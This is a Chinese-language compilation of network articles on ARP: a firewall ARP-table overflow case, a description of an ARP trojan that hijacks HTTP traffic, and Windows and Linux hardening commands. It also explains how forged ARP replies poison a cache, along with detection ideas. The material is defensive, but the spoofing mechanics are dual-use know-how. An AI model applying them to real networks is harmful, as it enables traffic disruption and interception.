最近，我单位碰到一个非常奇怪的问题，一台P4品牌电脑，内置英特尔网卡，一直以来用得挺好，浏览互联网，内网的通信都很正常，突然有一天，发现这台计算机在浏览互联网时时通时断，ping互联网上的地址时，也是通一下，断一下，但ping内网时什么问题也没有，和内网的通信也非常正常，就是和互联网通信时有这种现象，非常令人费解。这台电脑的IP地址为192.168.24.55，防火墙的 IP地址为192.168.24.7。

检查物理链路

我单位所有访问互联网的电脑都是通过Netscreen NS25防火墙来连接的，如果说是防火墙的问题，而其他的电脑访问互联网都挺正常，没有时通时断的现象。根据这台电脑ping的现象来看，问题似乎应该在下三层，而时通时断的现象好像是典型的物理层的问题，那么首先开始检查链路。

这台电脑是接在一台Cisco三层交换机的某一个端口上，防火墙也是接在这台三层交换机上，在三层交换机上启用了路由，配置上肯定没有问题。先检查电脑到交换机的网线，如果说这根网线有问题，那么这台电脑与内网的通信也应该有问题，通过对这根网线的测试证实没有问题。防火墙到交换机的跳线就更应该没有问题了，因为其他的电脑都没有问题。由此可以判断链路是没有问题的，网卡会有问题吗？肯定也不会，因为它跟内网的通信是正常的，所以网卡肯定也没有问题。那么就可以排除物理层的问题了。

模拟数据通信

再看网络层，这台电脑能够访问互联网，但并不是完全不行，只不过有丢包而已，似乎网络层也不应该有问题，那么所有问题似乎就集中在数据链路层了。数据链路层的问题会是哪里呢？思考了几天，毫无头绪，最后只好仔细的想一想网络通信的过程，看能不能找到问题。

假设这台电脑有一个数据包需要发送到互联网，那么首先它会检查目的地址与本机地址是否是在一个网络中，如果不在一个网络中，就会将数据包发送给默认网关，本案例中目的IP为互联网地址，所以肯定不在一个网络中，所以数据包会发送给默认网关。在这里默认网关为那台Cisco三层交换机，IP地址为192.168.24.10。这时192.168.24.55这台电脑会检查本机的ARP表，查找192.168.24.10所对应的MAC地址，如果在ARP表中没有发现相应的ARP表项，它就会发送一个ARP请求包，将它发送给网络中的所有设备来获得192.168.24.10的MAC地址。由于ARP请求包是以广播方式发送的，网络中的所有设备都会接收到这个包，然后传送给网络层检验。

当Cisco三层交换机接收到这个ARP请求时，就会检查本机的IP地址和ARP请求包中的目的IP地址是否相同，如果相同，交换机就会做出ARP应答，将它的MAC地址发送给源，也就是192.168.24.55这台电脑。这台电脑收到ARP应答包后，就会将交换机的IP地址192.168.24.10和MAC地址写入ARP表，然后将交换机的MAC地址作为目的MAC地址封装到数据包中，并将数据包发送到交换机。交换机在收到数据包后，就会检查目的IP是否在本网段中，发现不在本网段中，就会查找路由表，看看有没有到目的IP的路由条目，如果没有，就会将数据包发送给默认路由，在本案例中这台交换机的默认路由是那台IP为192.168.24.7的防火墙。所以交换机就会发送一个ARP广播，以获得防火墙的MAC地址。防火墙做出ARP应答后，交换机就会将防火墙的MAC地址作为目的MAC地址封装到数据包中，数据包就会发送到防火墙，然后防火墙就会又重复上述过程，将数据包发送给互联网上的目的地址，

这一切过程都是正常的，没有什么问题。在电脑和交换机的ARP表中都能找到相应的ARP记录，用tracert命令跟踪路由也是正常的，那问题究竟在什么地方呢？看来还得继续分析。

过滤ARP表

在数据包到达了互联网上的目的地址之后，响应的数据包要返回到这台电脑，那么它也应该重复前面的过程。返回数据包先到达防火墙，在防火墙的ARP表中寻找目的IP地址所对应的MAC地址，如果没有，就会发送ARP请求，得到目的电脑的MAC地址，将电脑的IP地址和MAC地址写入防火墙的ARP表，封装后发送给这台电脑。这一切看起来都是正常的，但为什么会出现时通时断的现象呢？由这台电脑在内网都是正常的现象来判断，在三层交换机上应该是没有问题的，只是在访问互联网时才出现问题，最后决定从防火墙上开始检查。

Telnet上防火墙，检查防火墙配置，一切正常；检查端口，一切正常；检查路由表，也是一切正常。疑惑中，似乎不知该从哪里下手了。突然间，想起来为了防止内网用户盗用IP地址上网，在防火墙上做了IP地址和MAC地址的绑定的！对，检查检查ARP表。于是输入命令：get arp，显示一大串ARP表的信息，竟然全部是IP地址和MAC地址的静态绑定的信息，仅仅只有一条动态的，那是防火墙的下一跳的IP地址和下一跳的MAC地址的信息，就是没有192.168.24.55的ARP表项，难道是……ARP表的问题？似乎看到了一丝希望！

于是决定先清除几个静态绑定的ARP表项试试，先用unset arp命令一连清除了6条静态绑定的ARP表项，然后在那台电脑上ping互联网的地址，居然不丢包了！？困扰我几天的问题难道就这样解决了吗？我简直有点不敢相信，又让我的同事在这台电脑上面测试一下，登录QQ，浏览网页，收发邮件……，居然一切正常，再也没有原来时通时断的现象了！再Telnet到防火墙上，get arp一看，192.168.24.55那台电脑的ARP表项赫然在目。看来问题真的解决了！高兴之余坐下来再好好的想一想原因吧。

故障溯源

这台Netscreen NS 25的防火墙最多支持128个ARP表项，如果不进行静态绑定，ARP表项会不断地进行更新，超时的自动会删掉，所以不会出现ARP表项被占满的情况。而如果是静态绑定，那么它永远就不会被清除，永远会占据一个ARP表项，留给动态使用的ARP表项空间就会越来越少，直到全部占满，导致我所碰到的情况。那么既然如此，有朋友会问了，既然都占满了，其他的电脑就会完全不通，为什么会出现时通时断的现象呢？于是我将ARP表项数了一下，静态绑定的刚好达到127个，剩下一个给防火墙的下一跳的地址占用了，注意这个是动态的，当它的更新时间到了之后，就被删掉了，那台电脑就占用了这个表项，于是网络就通了，因为还有其它的电脑在不断地访问互联网，所以192.168.24.55的ARP表项一到达更新时间马上就会被防火墙的下一跳的地址所占用，这时网络就不通了。其实在这时，我单位的所有机器在访问互联网时都会出现时通时断的现象，只不过防火墙的下一跳的地址占用ARP表项的时间长，互联网中断的时间在大家能够忍受的范围内，都没有发觉罢了。因为防火墙的下一跳的地址占用ARP表项的时间长，192.168.24.55的ARP表项写不进ARP表，产生超时，所以它不通的时间就长一些，就出现时通时断的现象了。

篇12：黑金ARP病毒原理

ARP欺骗攻击历史极为悠久，可以说与以太网技术同时诞生，ARP不安全的协议机制给了攻击者实施恶意欺骗攻击的机会，可以通过发送虚假ARP数据将被攻击用户本地的ARP缓存内容恶意涂改，从而扰乱局域网正常的通讯秩序产生一系列通讯故障。

早期的ARP欺骗攻击，多用来干扰用户正常通讯(如某些网管类软件利用ARP攻击来限制指定计算机网速甚至可以完全切断指定计算机网络通信)或是被用来欺骗全网通信，企图Sniffer嗅探网络数据包，伺机窃取有价值的信息。

而近年来的黑金ARP病毒欺骗攻击其目的则和以往的单纯ARP欺骗病毒完全不同，明显表露出其木马化的本质。以黑金ARP病毒Backdoor.Win32.ARP.g为例，该病毒的特别之处就是在原有ARP欺骗基础上，捆绑正常的网络分析软件WinPcap，试图欺骗传统杀毒软件，利用WinPcap提供的网络分析功能，劫持网络内所有HTTP通讯，并且强行在HTTP数据包中插入带有病毒程序的网页链接，使得局域网内任意一个用户在访问正常网页时，都会自动下载木马病毒，

也就是说，只要局域网内有一台计算机感染了该木马，局域网内所有的计算机就都有可能被感染上木马病毒。可见，黑金ARP对局域网危害极大，正可谓是一机中毒，全网“遇难”。理论上如果网内只有一台计算机中了黑金ARP，那么局域网虽受ARP欺骗影响，但仍尚可维持通讯。但是实际上前述的假设在现实中是不成立的，因为只要有一台计算机中毒，局域网内很快就会变为多台计算机同时中毒，而多台计算机同时发起ARP欺骗的直接后果就是网络内计算机互相欺骗，局域网全网通讯瘫痪。

清除黑金ARP病毒，首先要做的就是要彻底清除其毒源，换句话说如果将病毒源连根拔起清除彻底，局域网自然而然就会恢复正常。B公司的网管也明白这个道理，也尝试安装过国内著名杀毒软件力图解决这个问题，但是收效甚微，扫描时一个病毒也没有报出来。

其实事情是很简单的，所有的黑金ARP病毒都必然具备的一个行为特点就是乱发ARP欺骗数据包，因此采用行为分析技术的主动防御软件对其会有很好地清除能力。主动防御软件根据行为分析一旦发现有程序试图乱发ARP欺骗数据包，立即将其查杀即可。

篇13：网络名词“arp攻击”

arp

分层端口隔离

无线配置指导

dhcp 主备-----linux

网络虚拟化------云计算

veb vepa 多通道区别

基于时间段的qos

二层三层网络

策略路由多出口设计+ips选路

本文出自 “网络蟑螂” 博客，请务必保留此出处fenggao.blog.51cto.com/8119616/1409023

篇14：ARP防火墙安装指南

注意：在Windows /XP/系统上安装单机版，无特殊之处，一路点击“下一步”即可，在Vista系统上安装单机版，必须严格按照安装指南来操作，否则安装将失败。

一、单机版 v5.0 安装指南（适用于Windows 2000/XP/2003）

1.1 双击安装程序，显示欢迎界面，点击“下一步”，

1.2 仔细阅读“许可协议”，如同意，选中“我接受许可协议中的条款”，点击“下一步”，

1.3 选择安装目录，如无特殊需求，保持默认的安装目录即可。点击“下一步”，

1.4 准备就绪后，点击“安装”，

1.5 安装过程中会弹出一个提示信息，请仔细阅读，（注意：安装过程中网络会中断几秒，这是正常）

1.6 安装完成

二、单机版 v5.0 安装指南（适用于Windows Vista）

2.1 选中安装程序包，点击鼠标右键，在弹出的菜单中选择“以管理员身份运行”，

2.2 在系统弹出的提示界面中，选择“允许”，

2.3 点击“下一步”，

2.4 仔细阅读“许可协议”，如同意，选中“我接受许可协议中的条款”，点击“下一步”，

2.5 选择安装目录，如无特殊需求，保持默认的安装目录即可，

点击“下一步”，

2.6 点击“安装”，

2.7 安装过程中会有一个提示信息，请仔细阅读，然后点击“确定”，

2.8 安装驱动程序的过程中，系统会弹出提示信息，点击“始终安装此驱动程序软件”，此提示信息总共会出现三次左右，（注：安装过程中网络会中断几秒，这是正常情况）

2.9 取消选中“启动ARP防火墙单机版 v5.0beta1”，点击“完成”。

2.10 选中桌面上“ARP防火墙单机版”的快捷方式，点击鼠标右键，在弹出的菜单中选择“属性”，

2.11 在属性窗口，点击“兼容性”，选中“请以管理员身份运行该程序”，点击“确定”。

2.12 双击桌面上的“ARP防火墙单机版”快捷方式即可运行。运行之后，系统会有一个提示，点击“允许”即可。

篇15：linux防护ARP攻击

“arping - send ARP REQUEST to a neighbour host“arping [ -AbDfhqUV] [ -c count] [ -w deadline] [ -s source] -I interface destination-U Unsolicited ARP mode to update neighbours’ ARP caches. No replies are expected.

关键命令：

arping -U -I 发送包的网卡接口 -s 源ip 目的ip

实例：

假设你的eth0接口对应的ip为192.168.100.11,网关为192.168.100.2你就可以使用

arping -U -I eth0 -s 192.168.100.11 192.168.100.2

篇16：Windows7如何防范以及查杀ARP病毒？

方法/步骤：

1、做好第一道防线，实现网关和终端双向绑定IP和MAC地址。针对局域网中的每一台计算机利用“IPCONFIG”命令获取本机IP和MAC地址，并将该信息添加到路由器ARP映射表中。同时通过查看路由器的LAN口参数获取其IP和MAC地址，然后在局域网中的每台计算机上实现静态ARP绑定。

具体做法是：打开“运行”对话框，输入CMD进入MSdos界面，通过IPCONFIG命令获取本机的IP地址和MAC地址。然后打开浏览器，输入网址“http;//192168.1.1”进入路由器配置界面，在界面中定位到ARP与IP地址绑定位置处，设置“单机的MAC地址和IP地址的匹配规则”，指定局域网中各个计算机的IP地址和其对应MAC地址实现绑定。

2、通过“网络参数”-“LAN口参数”来查找路由器的MAC地址和IP地址，然后在局域网中的每台电脑中实现静态ARP绑定。

具体做法：打开“运行”对话框，输入CMD进入MSdos界面，然后通过输入如图所示的命令实现网关IP地址和MAC地址的绑定。

3、付出少需的代价换来局域网的长久平静。打开360安全卫士，依次点击“功能大全”-“木马防火墙”-“开启ARP防火墙”，在ARP防火墙上点击，进入360局域网防护界面，点击“切换到手动绑定防火墙”，输入经过查找的正确的网关IP和MAC地址后点击确定。

4、斩草除根，彻底追踪查杀ARP病毒。利用局域网ARP欺骗检测工具来确定ARP攻击源，然后利用ARP专杀工具进行杀毒。例如：安天ARP欺骗检测工具，此检测工具针对流行的局域网ARP欺骗，可以有效的定位到发起ARP欺骗的主机。也可以采用360来实现ARP攻击源的查找，在受到ARP攻击后，通过点击360安全为师局域网防护界面中的“查看详细日志”来追踪攻击源。查找并定位到攻击源地址以后，在相应的计算机上安装ARP专杀工具进行查杀操作。例如，当我们的机子受到ARP攻击时，我们查到了攻击源的MAC地址：00-21-97-12-15-0D，将该MAC地址与路由器当中的ARP映射表进行对比来确定攻击源主机，然后对该主机进入ARP的查杀工作。

5、另外我们还可以借助“聚生网管”软件来实现IP与MAC地址的绑定操作，从而更加有效提高局域网免受ARP病毒的攻击。在程序主界面中，点击“安全防御”-“IP和MAC绑定”项。

6、在弹出的窗口中勾选“启用IP-MAC绑定”，然后点击“手机添加绑定”按钮。最后输入IP以及对应的MAC地址，并点击“保存设置”即可。

以上就是Windows7如何查杀ARP病毒的教程了，教程主要讲述了如何防范ARP病毒以及如何查杀ARP病毒，大家如果中了这个病毒就不要慌了，按照这篇教程操作下来即可解决问题。

[Windows7如何防范以及查杀ARP病毒？]

篇17：ARP类病毒的解决措施

1、清空ARP缓存: 大家可能都曾经有过使用ARP的指令法解决过ARP欺骗问题，该方法是针对ARP欺骗原理进行解决的，一般来说ARP欺骗都是通过发送虚假的MAC地址与IP地址的对应ARP数据包来迷惑网络设备，用虚假的或错误的MAC地址与IP地址对应关系取代正确的对应关系。若是一些初级的ARP欺骗，可以通过ARP的指令来清空本机的ARP缓存对应关系，让网络设备从网络中重新获得正确的对应关系，具体解决过程如下：

第一步：通过点击桌面上任务栏的“开始”->“运行”，然后输入cmd后回车，进入cmd(黑色背景)命令行模式；

第二步：在命令行模式下输入arp -a命令来查看当前本机储存在本地系统ARP缓存中IP和MAC对应关系的信息；

第三步：使用arp -d命令，将储存在本机系统中的ARP缓存信息清空，这样错误的ARP缓存信息就被删除了，本机将重新从网络中获得正确的ARP信息，达到局域网机器间互访和正常上网的目的。如果是遇到使用ARP欺骗工具来进行攻击的情况，使用上述的方法完全可以解决。但如果是感染ARP欺骗病毒，病毒每隔一段时间自动发送ARP欺骗数据包，这时使用清空ARP缓存的方法将无能为力了。下面将接收另外一种，可以解决感染ARP欺骗病毒的方法。

2、指定ARP对应关系：其实该方法就是强制指定ARP对应关系。由于绝大部分ARP欺骗病毒都是针对网关MAC地址进行攻击的，使本机上ARP缓存中存储的网关设备的信息出现紊乱，这样当机器要上网发送数据包给网关时就会因为地址错误而失败，造成计算机无法上网。

第一步：我们假设网关地址的MAC信息为00-14-78-a7-77-5c，对应的IP地址为192.168.2.1，

指定ARP对应关系就是指这些地址。在感染了病毒的机器上，点击桌面->任务栏的“开始”->“运行”，输入cmd后回车，进入cmd命令行模式；

第二步：使用arp -s命令来添加一条ARP地址对应关系，例如arp -s 192.168.2.1 00-14-78-a7-77-5c命令。这样就将网关地址的IP与正确的MAC地址绑定好了，本机网络连接将恢复正常了；

第三步：因为每次重新启动计算机的时候，ARP缓存信息都会被全部清除。所以我们应该把这个ARP静态地址添加指令写到一个批处理文件（例如：bat）中，然后将这个文件放到系统的启动项中。当程序随系统的启动而加载的话，就可以免除因为ARP静态映射信息丢失的困扰了。

3、添加路由信息应对ARP欺骗：

一般的ARP欺骗都是针对网关的，那么我们是否可以通过给本机添加路由来解决此问题呢。只要添加了路由，那么上网时都通过此路由出去即可，自然也不会被ARP欺骗数据包干扰了。第一步：先通过点击桌面上任务栏的“开始”->“运行”，然后输入cmd后回车，进入cmd(黑色背景)命令行模式；

第二步：手动添加路由，详细的命令如下：删除默认的路由: route delete 0.0.0.0;添加路由:

route add -p 0.0.0.0 mask 0.0.0.0 192.168.1.254 metric 1;确认修改:

route change此方法对网关固定的情况比较适合，如果将来更改了网关，那么就需要更改所有的客户端的路由配置了。

4、安装杀毒软件：

安装杀毒软件并及时升级，另外建议有条件的企业可以使用网络版的防病毒软件。

篇18：局域网内如何预防ARP欺骗

ARP欺骗的原理如下：

假设这样一个网络，一个Hub接了3台机器

HostA HostB HostC 其中

A的地址为：IP：192.168.10.1 MAC: AA-AA-AA-AA-AA-AA

B的地址为：IP：192.168.10.2 MAC: BB-BB-BB-BB-BB-BB

C的地址为：IP：192.168.10.3 MAC: CC-CC-CC-CC-CC-CC

正常情况下 C:\arp -a

Interface: 192.168.10.1 on Interface 0x1000003

Internet Address Physical Address Type

192.168.10.3 CC-CC-CC-CC-CC-CC dynamic

现在假设HostB开始了罪恶的ARP欺骗：

B向A发送一个自己伪造的ARP应答，而这个应答中的数据为发送方IP地址是192.168.10.3（C的IP地址），MAC地址是DD-DD-DD-DD-DD-DD（C的MAC地址本来应该是CC-CC-CC-CC-CC-CC，这里被伪造了），当A接收到B伪造的ARP应答，就会更新本地的ARP缓存（A可不知道被伪造了）。而且A不知道其实是从B发送过来的，A这里只有192.168.10.3（C的IP地址）和无效的DD-DD-DD-DD-DD-DD mac地址，没有和犯罪分子B相关的证据，哈哈，这样犯罪分子岂不乐死了。

现在A机器的ARP缓存更新了：

C:\arp -a

Interface: 192.168.10.1 on Interface 0x1000003

Internet Address Physical Address Type

192.168.10.3 DD-DD-DD-DD-DD-DD dynamic

这可不是小事。局域网的网络流通可不是根据IP地址进行，而是按照MAC地址进行传输。现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址。现在A开始Ping 192.168.10.3，网卡递交的MAC地址是DD-DD-DD-DD-DD-DD，结果是什么呢？网络不通，A根本不能Ping通C！！

所以，局域网中一台机器，反复向其他机器，特别是向网关，发送这样无效假冒的ARP应答信息包，NND，严重的网络堵塞就开始了！网吧管理员的噩梦开始了，

我的目标和任务，就是第一时间，抓住他。不过从刚才的表述好像犯罪分子完美的利用了以太网的缺陷，掩盖了自己的罪行。但其实，以上方法也有留下了蛛丝马迹。尽管，ARP数据包没有留下HostB的地址，但是，承载这个ARP包的ethernet帧却包含了HostB的源地址。而且，正常情况下ethernet数据帧中，帧头中的MAC源地址/目标地址应该和帧数据包中ARP信息配对，这样的ARP包才算是正确的。如果不正确，肯定是假冒的包，可以提醒！但如果匹配的话，也不一定代表正确，说不定伪造者也考虑到了这一步，而伪造出符合格式要求，但内容假冒的ARP数据包。不过这样也没关系，只要网关这里拥有本网段所有MAC地址的网卡数据库，如果和Mac数据库中数据不匹配也是假冒的ARP数据包。也能提醒犯罪分子动手了。

二、防范措施

1. 建立DHCP服务器(建议建在网关上，因为DHCP不占用多少CPU，而且ARP欺骗攻击一般总是先攻击网关，我们就是要让他先攻击网关，因为网关这里有监控程序的，网关地址建议选择192.168.10.2 ，把192.168.10.1留空，如果犯罪程序愚蠢的话让他去攻击空地址吧)，另外所有客户机的IP地址及其相关主机信息，只能由网关这里取得，网关这里开通DHCP服务，但是要给每个网卡，绑定固定唯一IP地址。一定要保持网内的机器IP/MAC一一对应的关系。这样客户机虽然是DHCP取地址，但每次开机的IP地址都是一样的。

2. 建立MAC数据库，把网吧内所有网卡的MAC地址记录下来，每个MAC和IP、地理位置统统装入数据库，以便及时查询备案。

3. 网关机器关闭ARP动态刷新的过程，使用静态路邮，这样的话，即使犯罪嫌疑人使用ARP欺骗攻击网关的话，这样对网关也是没有用的，确保主机安全。

网关建立静态IP/MAC捆绑的方法是：建立/etc/ethers文件，其中包含正确的IP/MAC对应关系，格式如下：

192.168.2.32 08:00:4E:B0:24:47

然后再/etc/rc.d/rc.local最后添加：

arp -f 生效即可

4. 网关监听网络安全。网关上面使用TCPDUMP程序截取每个ARP程序包，弄一个脚本分析软件分析这些ARP协议。ARP欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警：第一以太网数据包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者，ARP数据包的发送和目标地址不在自己网络网卡MAC数据库内，或者与自己网络MAC数据库 MAC/IP 不匹配。这些统统第一时间报警，查这些数据包（以太网数据包）的源地址(也有可能伪造)，就大致知道那台机器在发起攻击了。

5. 偷偷摸摸的走到那台机器，看看使用人是否故意，还是被任放了什么木马程序陷害的。如果后者，不声不响的找个借口支开他，拔掉网线(不关机,特别要看看Win98里的计划任务)，看看机器的当前使用记录和运行情况，确定是否是在攻击。

出几点加强安全防范的措施。环境是主机或者网关是基于Linux/BSD的。

篇19：无线路由器ARP攻击排除

随着现在社会信息技术的飞速发展，如今企业网络办公化也正式步入了无线网的领域中。构建无线网最大的好处就是组网无需布线，使用便捷，经济。所以对多数企业来说，无疑是组网方案的最佳选择。

大量的无线路由器被用于企业中，使得针对无线网络的故障诊断和安全保障变得与有线网络一样重要。

在企业无线网办公中经常会出现一些使用手册上未涉及到疑难和故障，有时难以应付，无法解决。下面笔者就无线网络中由路由器引发的典型故障进行分析，并提供解决方案。

连接错误线路不通

网络线路不通有很多原因造成，但首先要检查的是连接配置上有无错误。

在确保路由器电源正常的前提下首先查看宽带接入端。路由器上的指示灯可以说明宽带线路接入端是否正常，由说明书上可以辨认哪一个亮灯为宽带接入端及用户端，观察其灯闪亮状态，连续闪烁为正常，不亮或长亮不闪烁为故障。我们可以换一根宽带胶线代替原来的线路进行连接。

如果故障依旧，请查看路由器的摆放位置与接收电脑的距离是否过远或中间有大型障碍物阻隔。这时请重新放置路由器，使无线路由器与接收电脑不要间隔太多障碍物，并使接收电脑在无线路由器的信号发射范围之内即可。

无线网卡的检查也必不可少，可以更换新的网卡并重新安装驱动程序进行调试，再网卡中点击“查看可用的无线连接”刷新“网络列表”后设置网卡参数，并再“属性”中查看有无数据发送和接收情况，排除故障。

当然路由器自身的硬件故障也是导致线路不通的直接原因，但这并不是我们所能解决的范围，应及时联系厂商进行维修或更换。

设置不当无法连接

“设置”可以分为计算机设置和路由器设置两个方面。

计算机的设置相对简单，点击进入“网上邻居”属性，开启“无线网络连接”，然后设置“IP地址”“子网掩码”及“网关”，只要使计算机的IP地址与无线路由器的IP地址在同一网段即可。“网关”的设置可以参见网卡说明说中所述，一般情况下与路由器IP地址相同。

路由器的设置相对较为专业，复杂些。首先在系统浏览器中输入无线路由器IP地址，在弹出的登录界面中输入路由器的管理员登录名及密码即可进入设置界面。此时需要检查网络服务商所给你的宽带帐号及口令是否正确，如不正确，更正后尝试连接，如果连接后仍无法打开页面请点击进入路由器中的“安全设置”选项，查看是否开启“网络防火墙”，“IP地址过滤”以及“MAC地址过滤”选项，并做更正和设置，排除无法开启网络的故障。

网络攻击导致联网异常

ARP攻击以及非法入侵未设防的无线局域网已经是现在导致联网异常的典型案例了。由于安全设置的疏忽以及后期安全防护的不足，导致少数具有恶意的黑客对企业的重要信息及保密数据造成了极大的危害。

ARP攻击会造成网络IP冲突，数据的丢失及溢出，更有甚者会导致网络瘫痪。这些现象对企业组网的威胁都是很大的。

首先进入“带有网络的安全模式”，在无线网卡属性处更换电脑的IP地址，之后查看是否可以联网。另外购买安装专业的杀毒软件及网络防火墙是比较捷径的方法之一。

其次进入路由器“安全设置”选项进行高级设置。现在的大部分无线路由器都具有WEP的密码编码功能，用最长128bit的密码键对数据进行编码，在无线路由器上进行通信，密码键长度可以选择40bit或128bit,利用MAC地址和预设的网络ID来限制哪些无线网卡和接入点可以进入网络，完全可以确保网络安全，对于非法的接收这来说，截听无线网的信号是非常困难的，从而可以有效的防范黑客的入侵破坏和非法用户恶意的网络攻击。

最后要注意，在没有特殊需要或不具有专业技能的情况下禁止开启路由器中的“远程WEB管理”，功能选项。

路由器部分功能失灵无法使用

这个问题大多存在于一些老款的无线路由器中，当我们在配置路由器高级功能选项的时候，在反复确认连接无误的情况下就是有部分功能无法开启使用，这时你也许第一想到是否是硬件出了故障，其实不然。

首先我们要查看下路由器系统的版本，在查阅无线路由器说明书后，看该功能是否支持这个版本的路由器系统。路由器的系统通常有许多版本，每个版本支持不同的功能。如果你当前的软件版本不支持这个功能，那就应该找到相应的软件，先进行升级。

点击进入无线路由器的“系统工具”选项，进入后选择“软件升级”，此时在对话界面中会显示出当前的软件版本和硬件版本，在弹出的对话框中输入“文件名”(即系统升级的文件名)和“TFTP服务器IP”后点击“升级”即可。

升级时要注意：选择与当前硬件版本一致的软件进行升级，在升级过程中千万不要关闭路由器的电源，否则将导致路由器损坏而无法使用，在网络稳定的情况下升级过程很短整个过程不会超过一分钟。当你发现路由器在升级完毕后重启，请不要担心这是正常的。一般升级过后，路由器工作情况会更加稳定，并增加一些适用于此版本更多的新功能。